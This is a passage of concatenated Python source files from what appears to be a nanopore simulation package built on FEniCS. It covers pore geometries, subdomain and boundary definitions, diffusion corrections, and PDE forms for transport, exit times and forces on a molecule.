r = [0.5*params.l3, 0.5*params.l2, 0.5*params.l1, 0.5*params.l0,
0.5*params.l4]
ztop = params.hpore/2.
zbot = -ztop
z = [zbot, ztop - params.h2, ztop - params.h1, ztop, zbot + params.h4]
# indices: [(0,0), (0,1), (1,1), (1,2), ..., (4,4), (4,0)]
n = len(r)
        return [(r[i // 2 % n], z[(i+1) // 2 % n]) for i in range(2*n)]
def pore(self):
params = self.params
dna = self.polygon()
pore = MultiPore(**params)
pore.add_polygons(dna=dna)
pore.synonymes = dict(chargeddnab="dnab")
return pore
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
class AlphaHem(BasePore):
default = dict(
dim = 2,
Htop = 7.,
Hbot = 15.,
R = 10.,
cs = [-3, -6],
zmem = -7.625,
proteincs = [-2.3, -4.6, -7.2],
subs = None,
)
def pore(self):
return Pore(alphahempoly, porename="alphahem", **self.params)
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
class WeiPore(BasePore):
default = dict(
R = 120.,
R0 = 100.,
H = 240.,
#H0 = 70.,
x0 = None, #[0, 0, 46],
rMolecule = 6.,
dim = 3,
no_membrane = True,
dp = 45, # (small) pore diameter as used in paper
angle = 40, # aperture angle in degrees
lcCenter = 0.3,
lcMolecule = 0.1,
h = 10.,
subs = None,
reconstruct = False,
poreregion = True,
receptor = None, #[40., 0., -30.],
rReceptor = 1.25,
reverse = True, # if True, narrow opening is at the top, as in paper
)
def polygons(self, params):
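        # Build 2D cross-section polygons for the SAM, Au and SiN membrane layers of the conical
        # pore; Rsplit is the radius at which each layer is later split into a charged inner and an uncharged outer part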
lsin = 50. # SiN membrane thickness (in vertical direction)
lau = 40. # Au membrane thickness (in vertical direction)
rlau = 10. # Au thickness in radial direction
lsam = 3. # SAM layer thickness (in vertical direction)
l0 = lau + lsin + lsam
angle2 = params.angle/2. * np.pi/180.
tan = np.tan(angle2)
sin = np.sin(angle2)
cos = np.cos(angle2)
l = l0/2.
r0 = params.dp/2. - lsam
r1 = r0 + l0*tan
rsam = r0 + lsam/cos
rsin = r0 + lsam/cos + rlau
R = params.R
split = 0.7
Rsplit = split*R + (1.-split)*r1
if not params.reverse:
sam = [[r0, -l], [r1, l], [R, l], [R, l - lsam],
[rsam - tan*(lsam - l0), l - lsam], [rsam, -l]]
au = [sam[5], sam[4], sam[3], [R, -l + lsin],
[rsin + tan*lsin, -l + lsin],
[rsin, -l]]
sin = [au[5], au[4], au[3], [R, -l]]
else:
l = -l
sam = [[r0, -l], [r1, l], [R, l], [R, l + lsam],
[rsam - tan*(lsam - l0), l + lsam], [rsam, -l]][::-1]
au = [sam[-6], sam[-5], sam[-4], [R, -l - lsin],
[rsin + tan*lsin, -l - lsin],
[rsin, -l]][::-1]
sin = [au[-6], au[-5], au[-4], [R, -l]][::-1]
return sam, au, sin, Rsplit
def pore(self):
params = self.params
sam, au, sin, Rsplit = self.polygons(params)
sam, unchargedsam = polygons.Polygon(sam).split(Rsplit)
au, unchargedau = polygons.Polygon(au).split(Rsplit)
sin, unchargedsin = polygons.Polygon(sin).split(Rsplit)
pore = MultiPore(**params)
pore.add_polygons(chargedsam=sam, chargedau=au, chargedsin=sin,
unchargedsam=unchargedsam, unchargedau=unchargedau,
unchargedsin=unchargedsin)
pore.synonymes = dict(
sam={"chargedsam", "unchargedsam"},
au={"chargedau", "unchargedau"},
sin={"chargedsin", "unchargedsin"},)
if params.receptor is not None:
receptor = polygons.Ball(params.receptor, params.rReceptor, lc=0.1)
pore.add_balls(receptor=receptor)
return pore
def build(self):
pore = self.pore()
geo = pore.build(self.h, self.params.subs, self.reconstruct)
return geo
geometries = dict(
wei = WeiPore,
pugh = PughPore,
pughcyl = PughPoreCyl,
alphahem = AlphaHem,
)
if __name__ == "__main__":
lazy_import()
params = any_params(geoname="wei", h=10.)
geo = get_geo(**params)
print('geo')
#print(geo)
#print geo.mesh.coordinates()
geo.plot_subdomains()
geo.plot_boundaries(interactive=True)
```
#### File: geometries/Cyl2D/subdomains.py
```python
from dolfin import *
from .params_geo import *
from math import sqrt, pow
def subdomain_list(**params):
globals().update(params)
return [Fluid(), Molecule()]
def boundaries_list(**params):
globals().update(params)
return [Upper(), Lower(), Side(), MoleculeB()]
synonymes = {
"solid":"molecule",
"ions":"fluid",
"noslip":{"upper","lower","side"},
"nopressure":{"upper"},
"inflow":{"moleculeb"},
}
synonymes2 = {
"solid":"molecule",
"ions":"fluid",
"noslip":{"side"},
"nopressure":{"upper"},
"inflow":{"moleculeb"},
}
synonymes0 = {
"solid":"molecule",
"ions":"fluid",
"inflow":{"upper","lower","side"},
"nopressure":{"upper"},
"noslip":{"moleculeb"},
}
def norm2(x, y, z=0.0):
return sqrt(pow(x,2) + pow(y,2) + pow(z,2))
class Fluid(SubDomain):
def inside(self, x, on_boundary):
return True # other domains will overwrite
class Molecule(SubDomain):
def inside(self, x, on_boundary):
return norm2(x[0], x[1]-z0) <= r + tolc
# exterior fluid boundaries
class Upper(SubDomain):
def inside(self, x, on_boundary):
return x[1] >= l/2 - tolc
class Lower(SubDomain):
def inside(self, x, on_boundary):
return x[1] <= -l/2 + tolc
class Side(SubDomain):
def inside(self, x, on_boundary):
return x[0] >= R - tolc
class MoleculeB(SubDomain):
def inside(self, x, on_boundary):
return near(norm2(x[0], x[1]-z0), r)
```
#### File: geometries/H_geo/subdomains.py
```python
from dolfin import *
from math import sqrt, pow
from . import params_geo
synonymes = {
"bulkfluid": {"bulkfluidtop", "bulkfluidbottom"},
"fluid":{"bulkfluid","pore"},
"pore":{"poretop", "porecenter", "porebottom"},
"lipid":"membrane",
"solid":{"dna", "membrane", "molecule"},
"ions":"fluid",
"bulk":{"upperb","lowerb"}, #,"rightfluidb"},
"sideb":"rightfluidb",
"memb":"membraneb",
"chargeddnab":{"chargeddnainb","chargeddnaoutb"},
"dnab":{"chargeddnab","unchargeddnab"},
"noslip":{"dnab","membraneb"}, #"moleculeb"},
"nopressure":{"upperb","lowerb"},
#"charged":{"chargeddnab","moleculeb","membraneb"},
"ground":"upperb",
"bV":"lowerb",
"chargedmembraneb":"membraneb",
}
def norm2(x, y):
return sqrt(pow(x,2) + pow(y,2))
# lists containing subdomain classes, ordering is important: fluid first, molecule last
def subdomain_list(**params):
tmp = vars(params_geo)
params.update({key:tmp[key] for key in tmp \
if (not key in params and not key.startswith("__"))})
tolc = params["tolc"]
try:
x0 = params["x0"]
except (KeyError, NameError):
x0 = None
# subdomains
class BulkFluidTop(SubDomain):
def inside(self, x, on_boundary):
return x[1] > -tolc # other domains will overwrite
class BulkFluidBottom(SubDomain):
def inside(self, x, on_boundary):
return x[1] < tolc # other domains will overwrite
class Molecule(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return norm2(x[0], x[1]-x0[2]) <= params["rMolecule"] +tolc
else:
return False
#class MoleculeHull(SubDomain):
# def inside(self, x, on_boundary):
# if x0 is not None:
# return norm2(x[0], x[1]-x0[2]) <= params["rMolecule"] + params["rMH"] +tolc
# else:
# return False
class DNA(SubDomain):
def inside(self, x, on_boundary):
return (x[0] >= (params["r0"] - tolc) and x[0] <= (params["r1"] +tolc) \
and (abs(x[1])-tolc) <= 0.5*params["l0"])
class Membrane(SubDomain):
def inside(self, x, on_boundary):
return (x[0] >= (params["r1"] -tolc) and x[0] <= params["Rx"] \
and abs(x[1]) -tolc <= params["l1"]/2 )
# partion pore into three subdomains
class PoreTop(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(params["l1"]/2, params["l0"]/2)) and between(x[0], (0,params["r0"])))
class PoreCenter(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(-params["l1"]/2, params["l1"]/2)) and between(x[0], (0,params["r0"])))
class PoreBottom(SubDomain):
def inside(self, x, on_boundary):
return (between(x[1],(-params["l0"]/2,-params["l1"]/2)) and between(x[0], (0,params["r0"])))
return [BulkFluidTop(), BulkFluidBottom(), DNA(), Membrane(),
PoreTop(), PoreCenter(), PoreBottom(), Molecule(),]
def boundaries_list(**params):
tmp = vars(params_geo)
params.update({key:tmp[key] for key in tmp \
if (not key in params and not key.startswith("__"))})
tolc = params["tolc"]
try:
x0 = params["x0"]
except (KeyError, NameError):
x0 = None
# exterior fluid boundaries
class UpperB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[1], params["Ry"])
class LowerB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[1], -params["Ry"])
class LeftFluidB(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return on_boundary and near(x[0], 0) and \
not between(x[1], (x0[2] - params["rMolecule"], x0[2] + params["rMolecule"]))
else:
return on_boundary and near(x[0], 0)
class RightFluidB(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and near(x[0], params["Rx"]) and abs(x[1]) >= params["l1"]/2 -tolc
# DNA boundaries
class ChargedDNAinB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r0"] -tolc, params["r0"] +tolc)) \
and between(abs(x[1]), ( -tolc, params["l0"]/2 +tolc))
class ChargedDNAoutB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r1"] -tolc, params["r1"] +tolc)) \
and between(abs(x[1]), (params["l1"]/2 -tolc, params["l0"]/2 +tolc))
class UnchargedDNAB(SubDomain):
def inside(self, x, on_boundary):
return ( between(x[0], (params["r0"] -tolc, params["r1"] +tolc)) \
and near(abs(x[1]), params["l0"]/2) )
#return ( ( near(x[0], params["r0"]) and between( x[1], (-params["l1"]/2 -tolc, params["l1"]/2 + tolc) ) ) \
# or ( between(x[0], (params["r0"] -tolc, params["r1"] +tolc)) and near(abs(x[1]), params["l0"]/2) ) )
# Molecule boundaries
class MoleculeB(SubDomain):
def inside(self, x, on_boundary):
if x0 is not None:
return between(norm2(x[0], x[1]-x0[2]), (params["rMolecule"] -tolc, params["rMolecule"] +tolc) )
else:
return False
# Membrane boundaries
class MembraneB(SubDomain):
def inside(self, x, on_boundary):
return between(x[0], (params["r1"] -tolc, params["Rx"] +tolc)) and near(abs(x[1]), params["l1"]/2)
# cross-section interfaces
class CrossTop2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],params["l0"]/2) and between(x[0],(0,params["r0"])))
class CrossCenterTop2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],params["l1"]/2) and between(x[0],(0,params["r0"])))
class CrossCenterBottom2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],-params["l1"]/2) and between(x[0],(0,params["r0"])))
class CrossBottom2D(SubDomain):
def inside(self, x, on_boundary):
return (near(x[1],-params["l0"]/2) and between(x[0],(0,params["r0"])))
return [UpperB(), LowerB(), LeftFluidB(), RightFluidB(),
ChargedDNAinB(), ChargedDNAoutB(), UnchargedDNAB(), MembraneB(),
CrossTop2D(), CrossCenterTop2D(), CrossCenterBottom2D(), CrossBottom2D(), MoleculeB(),]
#the following code seems to be only needed for backward compatibility
# get MeshFunctions
# def get_subdomain(mesh):
# subdomain = CellFunction("size_t", mesh, 0)
# for i,sub in enumerate(subdomain_list()):
# sub.mark(subdomain, i+1)
# return subdomain
# def get_boundaries(mesh):
# boundaries = FacetFunction("size_t", mesh, 0)
# UpperB().mark(boundaries, 11)
# LowerB().mark(boundaries, 12)
# LeftFluidB().mark(boundaries, 13)
# RightFluidB().mark(boundaries, 14)
# ChargedDNAinB().mark(boundaries, 21)
# ChargedDNAoutB().mark(boundaries, 22)
# UnchargedDNAB().mark(boundaries, 23)
# MembraneB().mark(boundaries, 31)
# #MoleculeB(x0).mark(boundaries, 41, False)
# return boundaries
# def get_porepartitions(mesh, x0):
# crosssections = get_subdomain(mesh, x0)
# PoreTop().mark(crosssections, 51, False)
# PoreCenter().mark(crosssections, 52, False)
# PoreBottom().mark(crosssections, 53, False)
# Molecule(x0).mark(crosssections, 4)
# return crosssections
# # get piecewise constant (pwc) function on subdomains (e.g. permittivity)
# # specified by list/array either as CellFunction or as DG0 Function
# class CellFunction2Expression(Expression):
# def __init__(self, cellfun):
# self.cellfun = cellfun
# def eval_cell(self, values, x, cell):
# values[0] = self.cellfun[cell.index]
# def get_pwc_cellfun(mesh,somearray):
# cellfun = CellFunction("double", mesh)
# for i,sub in enumerate(subdomain_list()):
# sub.mark(cellfun, somearray[i])
# return cellfun
# def get_pwc_DG(mesh,somearray):
# cellfun = get_pwc_cellfun(mesh,somearray)
# expr = CellFunction2Expression(cellfun)
# dgfun = Function(FunctionSpace(mesh,"DG",0))
# dgfun.interpolate(expr)
# return dgfun
# def get_permittivity_DG(mesh):
# return get_pwc_DG(mesh,perm)
# def get_diffusion_DG(mesh):
# return get_pwc_DG(mesh,diff)
```
#### File: nanopores/models/diffusion_helpers.py
```python
from itertools import product
import numpy as np
import dolfin
from nanopores.tools import fields
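# wall-correction factors for the diffusivity of a sphere of radius r at
# distance h (resp. l) from a planar wall, relative to the bulk value:
# Dt_plane is a series expansion for motion parallel to the wall,
# Dn_plane sums the classical series solution for motion normal to the wall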
def Dt_plane(h, r):
x = r/h
return 1. - 9./16.*x + 1./8.*x**3 - 45./256.*x**4 - 1/16.*x**5
sinh = np.sinh
acosh = np.arccosh
def Dn_plane(l, r, N=100):
alpha = acosh(l/r)
s = 0.
for n in range(1, N):
n = float(n)
K = n*(n+1)/(2*n-1)/(2*n+3)
s += K*((2*sinh((2*n+1)*alpha)+(2*n+1)*sinh(2*alpha))/(4*(sinh((n+.5)*alpha))**2-(2*n+1)**2*(sinh(alpha))**2) - 1)
return 1./((4./3.)*sinh(alpha)*s)
def set_D_with_protein(setup):
meshp = setup.geo.mesh # mesh WITH protein
x0 = np.array(setup.geop.x0)
dim = setup.phys.dim
x0 = x0 if dim==3 else x0[::2]
r0 = setup.geop.rMolecule
rion = 0.11
# load diffusivity on mesh without protein
functions, mesh = fields.get_functions(**setup.solverp.diffusivity_data)
#dist = functions["dist"]
D0 = functions["D"]
# evaluate dist, D on meshp nodes
#Vp = dolfin.FunctionSpace(meshp, "CG", 1)
VVp = dolfin.VectorFunctionSpace(meshp, "CG", 1)
#distp_ = dolfin.interpolate(dist, Vp)
D0p_ = dolfin.interpolate(D0, VVp)
#distp = distp_.vector()[dolfin.vertex_to_dof_map(Vp)]
D0p = D0p_.vector()[dolfin.vertex_to_dof_map(VVp)]
D0p = np.column_stack([D0p[i::dim] for i in range(dim)])
x = meshp.coordinates()
# first create (N,3,3) array from D0 (N,3)
N = len(D0p)
Da = np.zeros((N, dim, dim))
i3 = np.array(range(dim))
Da[:, i3, i3] = D0p
# modify (N,3,3) array to include protein interaction
R = x - x0
r = np.sqrt(np.sum(R**2, 1))
overlap = r < rion + r0
#near = ~overlap & (r - r0 < distp)
h = np.maximum(r - r0, rion)
eps = 1e-2
D00 = setup.phys.D
Dt = np.zeros_like(r)
Dn = np.zeros_like(r)
Dt[overlap] = eps
Dn[overlap] = eps
Dt[~overlap] = Dt_plane(h[~overlap], rion)
Dn[~overlap] = Dn_plane(h[~overlap], rion, N=20)
# D(R) = Dn(h) RR^T + Dt(h) (I - RR^T) where R is normalized
R0 = R/(r[:, None] + 1e-100)
RR = (R0[:, :, None] * R0[:, None, :])
I = np.zeros((N, dim, dim))
I[:, i3, i3] = 1.
Dpp = D00*(Dn[:, None, None] * RR + Dt[:, None, None] * (I - RR))
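    # keep whichever correction is more restrictive: where the protein-based
    # tensor Dpp has a smaller last diagonal component than the precomputed
    # pore diffusivity Da, overwrite Da with Dpp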
near = Dpp[:, dim-1, dim-1] < Da[:, dim-1, dim-1]
Da[near] = Dpp[near]
# assign final result to dolfin P1 TensorFunction
VVV = dolfin.TensorFunctionSpace(meshp, "CG", 1, shape=(dim, dim))
D = dolfin.Function(VVV)
v2d = dolfin.vertex_to_dof_map(VVV)
Dv = D.vector()
for k, (i,j) in enumerate(product(i3, i3)):
Dv[np.ascontiguousarray(v2d[k::dim**2])] = np.ascontiguousarray(Da[:, i, j])
setup.phys.update(Dp=D, Dm=D)
return D
```
#### File: nanopores/physics/convdiff.py
```python
"standard convection-diffusion/transport equation with a given force field"
"u_t = div(-D*grad(u) + D/kT*F*u) + f"
from dolfin import *
from nanopores.tools.pdesystem import GeneralLinearProblem, LinearPDE
from nanopores.tools.transientpde import *
from nanopores.tools import solvermethods
__all__ = ["ConvectionDiffusionProblem", "ConvectionDiffusion"]
class ConvectionDiffusionProblem(GeneralLinearProblem):
method = dict(solvermethods.direct_reuse)
@staticmethod
def space(mesh, k=1, steady=False):
V = FunctionSpace(mesh, 'CG', k)
if steady:
R = FunctionSpace(mesh, 'Real', 0)
return V*R
else:
return V
@staticmethod
def initial_u(V, u0=None, steady=False):
u = Function(V)
if steady and u0 is not None:
W = V.sub(0).collapse()
w = interpolate(u0, W)
R = V.sub(1).collapse()
assign(u, [w, Function(R)])
elif u0 is not None:
u.interpolate(u0)
return u
@staticmethod
def forms(V, geo, phys, u, F, f=None, dt=None, steady=False, cyl=False):
u1 = TrialFunction(V)
v = TestFunction(V)
if steady:
u1, c = split(u1)
v, d = split(v)
u0, _ = split(u)
r2pi = Expression("2*pi*x[0]") if cyl else Constant(1.0)
dx = geo.dx("fluid")
grad = phys.grad
#lscale = Constant(phys.lscale)
#n = FacetNormal(geo.mesh)
D = geo.pwconst("Dtarget")
#D = Constant(phys.DtargetBulk)
kT = Constant(phys.kT)
# J = -D*grad(u) + D/kT*F*u
def J(u):
return -D*grad(u) + D/kT*F*u
if f is None: # injection function
f = Constant(0.)
if steady or dt is None:
            # -div(J) = f with Neumann constraint
a = inner(J(u1), grad(v))*r2pi*dx + (c*v + u1*d)*r2pi*dx
L = f*v*r2pi*dx + u0*d*r2pi*dx
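            # the extra scalar unknown c and test function d (Real space) act
            # as a Lagrange multiplier fixing the total mass of u1 to that of
            # u0, which makes the pure-Neumann steady problem well-posed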
else:
dt = Constant(dt)
# u_t = -div(J(u)) - f
# backward euler:
# (u1 - u)/dt = -div(J(u1)) - f
# u1 + dt*div(J(u1)) = u - dt*f
a = (u1*v - dt*inner(J(u1), grad(v)))*r2pi*dx
L = (u*v - dt*f*v)*r2pi*dx
#aNoBC = dt*lscale*inner(J(u1), n*v)*r2pi*geo.ds("lowerb")
return (a, L)
@staticmethod
def bcs(V, geo, bc={}, steady=False):
if steady:
return geo.pwBC(V.sub(0), "c0", value=bc)
else:
return geo.pwBC(V, "c0", value=bc)
class ConvectionDiffusion(TransientLinearPDE):
def __init__(self, geo=None, phys=None, dt=None, **problem_params):
TransientLinearPDE.__init__(self, ConvectionDiffusionProblem, geo=geo,
phys=phys, dt=dt, **problem_params)
class ConvectionDiffusionSteady(LinearPDE):
def __init__(self, geo=None, phys=None, **problem_params):
LinearPDE.__init__(self, geo, ConvectionDiffusionProblem,
phys=phys, steady=True, **problem_params)
```
#### File: nanopores/physics/electrolyte.py
```python
from nanopores.physics.default import *
T = 293 # temperature [K]
bulkcon = 300. # bulk concentration of ions [mol/m**3]
D = 1.9e-9 # diffusivity [m^2/s]
pscale = 1e7 # scaling of pressure
kT = lambda T: kB*T
UT = lambda kT: kT/qq
mu = lambda D, kT: D*qq/kT # mobility [m^2/Vs]
cFarad = qq*mol # Faraday constant [C/mol]
debye = lambda bulkcon, kT: dolfin.sqrt(rpermw*eperm*kT/qq**2/2/mol/bulkcon) # debye length [m]
bulkconduct = lambda bulkcon, mu: 2.*bulkcon*cFarad*mu # electrolyte bulk conductivity [S/m]
# rhs data
surfcharge = dict() # surface charge densities for Neumann RHS
volcharge = dict() # volume charges for RHS
cpflux = dict()
cmflux = dict()
# diffusion constants for 1:1 electrolyte
Dpdict = Dmdict = dict(default = "D", solid = 0.)
def Dp(geo, Dpdict):
return geo.pwconst("Dp", value=Dpdict)
def Dm(geo, Dmdict):
return geo.pwconst("Dm", value=Dmdict)
# piece-wise boundary conditions
v0 = dict()
c0 = dict()
cp0 = cm0 = c0
# no-slip velocity
U0 = lambda dim: dolfin.Constant(tuple(0. for i in range(dim)))
noslip = dict(noslip = "U0")
pressure = dict(nopressure = 0.)
synonymes = dict(
nocbc = set(),
)
```
#### File: nanopores/physics/exittime.py
```python
from dolfin import *
from ..tools.pdesystem import GeneralLinearProblem
from ..tools.transientpde import *
from ..tools.illposed import IllposedLinearSolver, Functional
__all__ = ["ExitTimeProblem", "SurvivalProblem", "SuccessfulExit"]
class ExitTimeProblem(GeneralLinearProblem):
k = 1
method = dict(
reuse = True,
iterative = False,
lusolver = ("superlu_dist" if has_lu_solver_method("superlu_dist") else "default"),
luparams = dict(
symmetric = False,
same_nonzero_pattern = True,
reuse_factorization = True,),
ks = "bicgstab",
kp = "ilu",
kparams = dict(
maximum_iterations = 200,
monitor_convergence = False,
relative_tolerance = 1e-4,
error_on_nonconvergence = False,
preconditioner = dict(
ilu = dict(fill_level = 1)))
)
@staticmethod
def space(mesh):
return FunctionSpace(mesh, 'CG', ExitTimeProblem.k)
@staticmethod
def forms(V, geo, phys, F):
u = TrialFunction(V)
v = TestFunction(V)
dx = geo.dx("exittime")
grad = phys.grad
# TODO: for some reason, taking the pwconst causes conflict with F, results in u=NaN
D = phys.DtargetBulk #geo.pwconst("Dtarget")
mu = D/phys.kT
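        # the solution u is the mean first exit time: it solves the backward
        # (adjoint Fokker-Planck) equation Lu = -1 with u = 0 on the exit
        # boundary, L being the generator of the drift-diffusion process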
J = -D*grad(v) + v*mu*F
a = inner(J, grad(u))*dx # this is the dual of -div(J(u))
L = Constant(-1.0)*v*dx
return (a, L)
@staticmethod
def bcs(V, geo, exit={"exit"}):
return [geo.BC(V, Constant(0.0), bou) for bou in exit]
class SurvivalProblem(GeneralLinearProblem):
k = 1
method = dict(
reuse = True,
iterative = False,
lusolver = ("superlu_dist" if has_lu_solver_method("superlu_dist") else "default"),
luparams = dict(
symmetric = False,
same_nonzero_pattern = True,
reuse_factorization = True,),
ks = "bicgstab",
kp = "ilu",
kparams = dict(
maximum_iterations = 1000,
monitor_convergence = False,
relative_tolerance = 1e-4,
error_on_nonconvergence = False,
preconditioner = dict(
ilu = dict(fill_level = 1)))
)
@staticmethod
def space(mesh):
return FunctionSpace(mesh, 'CG', SurvivalProblem.k)
@staticmethod
def forms(V, geo, phys, u, F, dt=None, steady=False):
u1 = TrialFunction(V)
v = TestFunction(V)
dx = geo.dx("exittime")
grad = phys.grad
# TODO: for some reason, taking the pwconst causes conflict with F, results in u=NaN
D = phys.DtargetBulk #geo.pwconst("Dtarget")
mu = D/phys.kT
J = -D*grad(v) + v*mu*F
if steady or dt is None:
a = inner(J, grad(u1))*dx
L = Constant(0.)*v*dx
else: # transient case
# backward euler: (u1 - u)/dt + divJ*(u1) = 0
a = (u1*v - dt*inner(J, grad(u1)))*dx
L = u*v*dx
return (a, L)
@staticmethod
def bcs(V, geo, goodexit=set(), badexit={"exit"}):
return ([geo.BC(V, Constant(0.0), bou) for bou in badexit] +
[geo.BC(V, Constant(1.0), bou) for bou in goodexit])
@staticmethod
def initial_u(V, u0=0.):
u = Function(V)
# initial condition u(x,0) = u0
# u0 = 1 for "survival" type problem, u0 = 0 for "death"
u.vector()[:] = u0
return u
class SuccessfulExit(TransientLinearPDE):
def __init__(self, geo=None, phys=None, dt=None, **problem_params):
TransientLinearPDE.__init__(self, SurvivalProblem, geo=geo,
phys=phys, dt=dt, **problem_params)
p = self.solution
pz = lambda z: p([0., 0., z])
zbtm = geo.params["zporebtm"]
ztop = geo.params["ztop"]
self.plotter = TimeDependentPlotter(pz, [zbtm, ztop, 200], dt)
def visualize(self):
self.plotter.plot(self.time[-1])
def finish_plots(self):
self.plotter.finish()
self.plot_functionals("semilogx")
```
#### File: nanopores/physics/pore_mol.py
```python
from nanopores.physics.pore import *
Qmol = 0. # molecule charge [q]
Qmolq = lambda Qmol, qq: Qmol*qq
qTarget = Qmolq
rpermMol = rpermDNA
permMol = lambda eperm, rpermMol: eperm*rpermMol
cyl = lambda dim: True if dim==2 else False
posDTarget = True # if True, position-dep. D used for target mols
# params for unspecific binding
bind_prob = 0.1
bind_time = .04e6 # binding duration [ns]
volcharge.update(
molecule = "Moleculeqv",
)
permittivity.update(
molecule = "permMol",
molecules = "permMol",
)
# geometry-dependent parameters
def Moleculeqv(geo, Qmolq, lscale, r2pi): #
"Molecule volume charge density [C/nm**3], adapted to discrete volume"
scale = dolfin.Constant(1.0/lscale**3)
r = scale*r2pi
def compute(geo):
vol = dolfin.assemble(r*geo.dx("molecule"))
return Qmolq/vol if vol > 0. else 0.
const = geo.constant("Moleculeqv", compute)
return const
def rMolecule(geo):
return geo.params["rMolecule"]
def rTarget(rMolecule, lscale):
return rMolecule/lscale
def DTargetBulk(rTarget, kT, eta, pi):
"Stokes-Einstein relation"
return kT/(6.*pi*eta*rTarget)
def ForceField(geo, grad, eta, qTarget, rTarget, pi):
def Forces0(v, u, subdomain=None):
E = -grad(v)
Fel = dolfin.Constant(qTarget)*E
Fdrag = dolfin.Constant(6.*pi*eta*rTarget)*u
F = Fel + Fdrag
# projecting
if subdomain is not None:
mesh = geo.submesh(subdomain)
else:
mesh = geo.mesh
V = dolfin.VectorFunctionSpace(mesh, "CG", 1)
Fel = dolfin.project(Fel, V)
Fdrag = dolfin.project(Fdrag, V)
F = dolfin.project(F, V)
return F, Fel, Fdrag
return Forces0
# goal functionals of various continuous quantities
def Fbare(geo, r2pi, Moleculeqv, grad, invscale):
def _Fel(v, i):
dx = geo.dx("molecule")
#scale = dolfin.Constant(lscale**(-3))
return Moleculeqv*(-r2pi*grad(v)[i])*dx
return _Fel
# results functionals
def ForcesPNPS(geo, Moleculeqv, div, grad, eta, r2pi,
invscale, dim, cFarad, pscale):
"electric and drag forces in 3D based on volume integrals"
def _forces(U):
v, cp, cm, u, p = U
p *= dolfin.Constant(pscale)
dx = geo.dx("molecule")
dxf = geo.dx("fluid")
rho0 = Moleculeqv
eta2 = dolfin.Constant(2.*eta)
sym = dolfin.sym
inner = dolfin.inner
V = dolfin.VectorFunctionSpace(geo.mesh, "CG", 1)
Farad = dolfin.Constant(cFarad)
fstokes = -Farad*(cp - cm)*grad(v)
F_dict = dict(Fel=[], Fdrag=[])
for i in range(dim):
Fbarevol = rho0*(-grad(v)[i]) * r2pi*invscale(3)*dx
ei = tuple((1. if j==i else 0.) for j in range(dim))
ei = dolfin.Constant(ei)
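            # uaux equals the i-th unit vector on the molecule boundary and is
            # zero elsewhere; testing the Stokes residual with it turns the
            # surface traction (drag force component) into a volume integral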
uaux = dolfin.Function(V)
geo.BC(V, ei, "moleculeb").apply(uaux.vector())
Fdragvol = -(-inner(fstokes, uaux) + \
eta2*inner(sym(grad(u)), sym(grad(uaux))) + \
div(uaux)*p)* r2pi*invscale(3)*dxf
F_dict["Fel"].append(dolfin.assemble(Fbarevol))
F_dict["Fdrag"].append(dolfin.assemble(Fdragvol))
F_dict["F"] = [Fe+Fd for Fe, Fd in zip(F_dict["Fel"], F_dict["Fdrag"])]
return F_dict
return _forces
def Fdrag(geo, div, grad, eta, r2pi, invscale, dim, pscale):
"Drag force on Stokes solution with zero RHS"
def _force(U):
u, p = U
p *= dolfin.Constant(pscale)
dxf = geo.dx("fluid")
eta2 = dolfin.Constant(2.*eta)
sym = dolfin.sym
inner = dolfin.inner
V = dolfin.VectorFunctionSpace(geo.mesh, "CG", 1)
F_dict = dict(Fdrag=[])
for i in range(dim):
ei = tuple((1. if j==i else 0.) for j in range(dim))
ei = dolfin.Constant(ei)
uaux = dolfin.Function(V)
geo.BC(V, ei, "moleculeb").apply(uaux.vector())
Fdragvol = -(eta2*inner(sym(grad(u)), sym(grad(uaux))) + \
div(uaux)*p)* r2pi*invscale(3)*dxf
F_dict["Fdrag"].append(dolfin.assemble(Fdragvol))
return F_dict
return _force
```
#### File: nanopores/scripts/ahemIV.py
```python
import math, nanopores, dolfin
# @Benjamin, Gregor TODO:
# -) check permittivity and surface charge of ahem
# -) what biased voltage to use?
# some default values for parameters
### geo params [nm]
geo_name = "aHem"
domscale = 1.
l4 = 15.
l3 = 15.
R = 20.
r0 = 5.
z0 = 10.
exit_i = 1
badexit = {"upperbulkb"}
goodexit = {"exit"}
### phys params
phys_name = "pore_molecule"
bV = .5 # [V]
ahemqs = 0.0 # [C/m**2]
rTarget = 0.5e-9 # [m] for diffusion coeff.
bulkcon = 1000
### num params
clscale = 10.
refinement = False
maxcells = 50e3
newtondamp = 1.0
reuse_mesh = False
tolnewton = 1e-1
skip_stokes = True
iterative = True
def _update(dic, dic2): # conservative update
dic.update({key:dic2[key] for key in dic2 if not key in dic})
def _globals(): # globals except hidden ones ("_"), modules and functions
from types import ModuleType, FunctionType
return {key : var for key, var in globals().items() if not
(key.startswith("_") or isinstance(var, ModuleType) or isinstance(var, FunctionType))}
def calculate(**params):
# this time we do it the simple way: just pass every parameter
# have to be careful though
globals().update(params)
params.update(_globals())
# use some of the parameters
params["x0"] = [r0, 0., z0]
params["l3"] = l3*domscale
params["R"] = R*domscale
    # TODO: does this do anything?
nanopores.IllposedNonlinearSolver.newtondamp = newtondamp
nanopores.PNPS.tolnewton = tolnewton
t = dolfin.Timer("meshing")
geo = nanopores.geo_from_xml_threadsafe(geo_name, **params)
print "Mesh generation time:",t.stop()
#dolfin.plot(geo.submesh("solid"), interactive=True)
phys = nanopores.Physics(phys_name, geo, **params)
t = dolfin.Timer("PNPS")
pnps = nanopores.PNPS(geo, phys)
if skip_stokes:
pnps.solvers.pop("Stokes")
pnps.alwaysstokes = True
pnps.solve()
print "Time to calculate F:",t.stop()
#pnps.visualize("fluid")
(v, cp, cm, u, p) = pnps.solutions(deepcopy=True)
# F = phys.Feff(v, u)
# def avg(u, dx):
# return dolfin.assemble(u*dx)/dolfin.assemble(dolfin.Constant(1.)*dx)
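    # split the z-current through the pore into diffusive, drift and
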